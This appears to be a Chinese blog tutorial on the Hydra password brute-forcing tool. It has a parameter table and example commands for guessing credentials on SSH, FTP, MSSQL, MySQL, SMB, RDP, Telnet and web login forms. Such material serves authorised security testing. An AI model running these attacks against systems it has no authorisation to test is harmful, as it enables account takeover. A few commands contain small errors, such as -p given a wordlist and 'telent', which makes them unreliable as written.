爆破神器 Hydra 的使用
爆破神器 Hydra 的使用
Hydra 是我在内网渗透中破解 mssql,mysql,ssh,ftp,smb 等账号密码常用的一款工具。
它的功能十分强大,支持很多协议的破解甚至于可以破解没有验证码的web登录。
下载地址:
Windows:https://github.com/maaaaz/thc-hydra-windows
Linux:https://github.com/vanhauser-thc/thc-hydra(这款工具在 kali Linux 中自带)
常用参数详解:
| -R | 根据上一次的进度继续破解 |
|---|---|
| -I | 忽略现有的恢复文件(不要等待 10 秒) |
| -S | 使用SSL协议连接 |
| -s | 指定服务端口(如果端口不是默认的话使用) |
| - l | 指定用户名,-L 指定用户名字典 |
| -p | 指定密码,-P 指定密码字典 |
| -x | 密码暴力生成,键入“-x - h" 获取帮助 |
| -y | 禁止在暴力破解中使用符号 |
| -e ns | n:空密码试探 s:使用指定用户和密码试探 |
| -u | 围绕用户循环,而不是密码(有效! 用 -x 暗示) |
| -C | 用户名可以用 : 分隔(username:password) 可以代替 -l username -p password |
| -M | 指定目标列表文件一行一条 |
| -o | 指定结果输出文件 |
| -b | 指定结果输出文件的格式(默认为:txt) |
| -f / -F | 在使用 -M 参数以后,找到第一对登录名和密码后停止爆破 |
| -t | 指定多线程数量(默认为 16 个线程) |
| -T | 指定多线程的并发数量(默认为 64) |
| -w / -W | 设置最大超时的时间,单位秒(默认是30s) |
| -c | 设置每次登录尝试的等待时间 |
| -4 / -6 | 使用 IPv4(默认)/IPv6 地址 |
| -v / -V / -d | 详细模式 / 每次尝试显示登录 + 通行证 / 调试模式 |
| -O | |
| -q | 不打印有关连接错误的消息 |
| -U | 服务模块使用详情 |
| -h | 更多命令行选项 (COMPLETE HELP) |
常用服务爆破示例
SSH
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 1 -vV -e ns -f 192.168.0.25 ssh
FTP
hydra -l 用户名 -P 密码字典 -vV -e ns IP地址 ftp
MSSQL
hydra -l administrator -P 密码字典 -vV -e ns IP地址 mssql
MYSQL
hydra -l administrator -P 密码字典 -vV -e ns IP地址 mysql
SMB
hydra -l administrator -P 密码字典 -vV -e ns IP地址 smb
RDP
hydra -l administrator -P 密码字典 -vV -e ns IP地址 rdp
TELENT
hydra -l administrator -P 密码字典 -vV -e ns IP地址 telent
爆破web登录
get方式提交
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
https破解
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
浙公网安备 33010602011771号